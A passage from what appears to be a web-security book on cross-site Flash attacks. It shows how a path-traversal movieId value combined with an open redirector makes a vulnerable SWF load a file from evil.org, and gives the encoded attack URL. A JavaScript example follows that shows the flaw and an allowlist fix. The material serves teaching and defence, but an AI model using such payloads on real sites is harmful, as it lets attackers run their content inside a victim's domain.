baseUrl + "/movie.swf");
an attacker would push the concatenated text "/movie.swf" into a URL parameter, thus
essentially commenting out the concatenated text.
Leveraging URL Redirectors for XSF Attacks
Popularity: 1
Simplicity: 5
Impact: 8
Risk Rating: 8
Suppose example.com hosted an SWF with the following code:
loadMovie("http://example.com/movies/" + _root.movieId + ".swf?other=info");
And suppose example.com had an open redirector at http://example.com/redirect that
would redirect to any domain. An attacker could use example.com's redirector to mount
an attack using the following attack string for movieId:
../redirect=http://evil.org/HackWorld.swf%3F
loadMovie() would then load this,
http://example.com/movies/../redirect=http://evil.org/HackWorld.swf%3F.swf?other=info
which is the same as this,
http://example.com/redirect=http://evil.org/HackWorld.swf%3F.swf?other=info
which redirects to this:
http://evil.org/HackWorld.swf
Thus, the vulnerable SWF still loads HackWorld in the example.com domain! With URL
encoding, the attack URL would look like this:
http://example.com/vulnerable.swf?movieId=../redirect%3Dhttp%3A//evil.org/HackWorld.swf%253F
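
The following is an added example, not code from the book. It reproduces the page's concatenation in JavaScript to show how the "../" segment escapes the /movies/ directory once the URL is normalized, and sets a hardened builder beside it. The names MOVIE_BASE, buildMovieUrl, normalizedPath and safeMovieUrl, the allowlist pattern and the sample id "intro_01" are assumptions made for illustration.

```javascript
// Added example. MOVIE_BASE mirrors the prefix in the page's loadMovie() call.
const MOVIE_BASE = "http://example.com/movies/";

// Same concatenation as the SWF on the page (the vulnerable pattern).
function buildMovieUrl(movieId) {
  return MOVIE_BASE + movieId + ".swf?other=info";
}

// Path the HTTP client actually requests after "../" segments are collapsed.
function normalizedPath(url) {
  return new URL(url).pathname;
}

// Hypothetical hardened builder: allowlist the id, then confirm the resolved
// URL is still the expected file under /movies/ on the same origin.
function safeMovieUrl(movieId) {
  if (typeof movieId !== "string" || !/^[A-Za-z0-9_-]{1,64}$/.test(movieId)) {
    return null; // rejects "/", ".", ":", "%", "=" and anything else unexpected
  }
  const base = new URL(MOVIE_BASE);
  const url = new URL(buildMovieUrl(movieId));
  const expectedPath = base.pathname + movieId + ".swf";
  if (url.origin !== base.origin || url.pathname !== expectedPath) {
    return null; // defence in depth: resolved path left /movies/
  }
  return url.href;
}

// The movieId value given on the page.
const pageMovieId = "../redirect=http://evil.org/HackWorld.swf%3F";

console.log(normalizedPath(buildMovieUrl(pageMovieId))); // no longer under /movies/
console.log(safeMovieUrl(pageMovieId));                  // null
console.log(safeMovieUrl("intro_01"));                   // constructed benign id
```

Input validation in the SWF does not remove the open redirector itself, which remains usable from any other code path that builds URLs on the same host.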
236 Hacking Exposed Web 2.